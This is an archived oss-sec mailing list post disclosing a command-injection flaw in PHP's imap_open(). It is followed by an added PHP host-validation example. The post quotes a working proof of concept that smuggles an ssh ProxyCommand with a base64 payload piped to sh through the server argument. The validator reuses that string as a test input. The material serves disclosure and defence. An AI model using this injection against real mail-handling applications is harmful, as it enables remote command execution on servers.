oss-sec mailing list archives
PHP imap_open() script injection
From: Hanno Böck <hanno () hboeck de>
Date: Thu, 22 Nov 2018 21:02:14 +0100
Hi,

This was apparently posted on some Russian forum recently and then re-posted to GitHub:
https://antichat.com/threads/463395/#post-4254681
https://github.com/Bo0oM/PHP_imap_open_exploit/blob/master/exploit.php

PoC code:

$server = "x -oProxyCommand=echo\tZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64\t-d|sh}";
imap_open('{'.$server.':143/imap}INBOX', '', '') or die("\n\nError: ".imap_last_error());

It's pretty self explaining, it seems imap_open() will pass things to ssh and this is vulnerable to a shell injection.

Impact would be mostly relevant if someone has some imap functionality where a user can define a custom imap server. (Though it might also be used as a bypass for environments where exec() and similar functions are restricted.)

I reported it to upstream PHP a few days ago, it was closed as a duplicate, so it seems they already knew about it. It's unfixed in current versions.

There seems to be some speculation that this might've been involved in a hack of a .onion hoster:
https://danwin1210.me/

--
Hanno Böck
https://hboeck.de/

mail/jabber: hanno () hboeck de
GPG: FE73757FA60E4E21B937579FA5880072BBB51E42
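An added example, not part of the original post or the linked repository: one way an application that lets users name their own IMAP server could validate the host before it is placed in the mailbox string given to imap_open(). The function name build_imap_mailbox and the sample inputs are hypothetical; /norsh is the mailbox flag documented for imap_open().

```php
<?php
// Added example; build_imap_mailbox() is a hypothetical helper, not PHP's API.

/**
 * Build a mailbox string from a user-supplied IMAP host, or throw.
 * IPv6 literals are deliberately not accepted by this sketch.
 */
function build_imap_mailbox(string $host, int $port = 143, string $folder = 'INBOX'): string
{
    // Strict allow-list: DNS labels of letters, digits and inner hyphens,
    // joined by dots. This rejects spaces, tabs, '=', '|', '{', '}', '/'
    // and a leading '-', all of which the PoC server string depends on.
    $label = '[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?';
    $hostOk = strlen($host) <= 253
        && preg_match('/\A' . $label . '(?:\.' . $label . ')*\z/', $host) === 1;
    if (!$hostOk) {
        throw new InvalidArgumentException('rejected IMAP host');
    }
    if ($port < 1 || $port > 65535) {
        throw new InvalidArgumentException('rejected IMAP port');
    }
    // The folder must not be able to close or reopen the {...} server part.
    if (preg_match('/\A[A-Za-z0-9 ._\/-]{1,128}\z/', $folder) !== 1) {
        throw new InvalidArgumentException('rejected folder name');
    }
    // /norsh: do not use rsh or ssh to establish a preauthenticated session.
    return sprintf('{%s:%d/imap/norsh}%s', $host, $port, $folder);
}

// Constructed inputs: an ordinary host, and one shaped like the PoC server
// string above with its payload replaced by a placeholder.
$samples = [
    'mail.example.org',
    "x -oProxyCommand=echo\tPLACEHOLDER|base64\t-d|sh}",
];
foreach ($samples as $host) {
    try {
        echo build_imap_mailbox($host), "\n";
    } catch (InvalidArgumentException $e) {
        echo $e->getMessage(), "\n";
    }
}
```

The helper only builds the string, so it runs without the imap extension loaded; the caller passes the returned value to imap_open() together with the credentials.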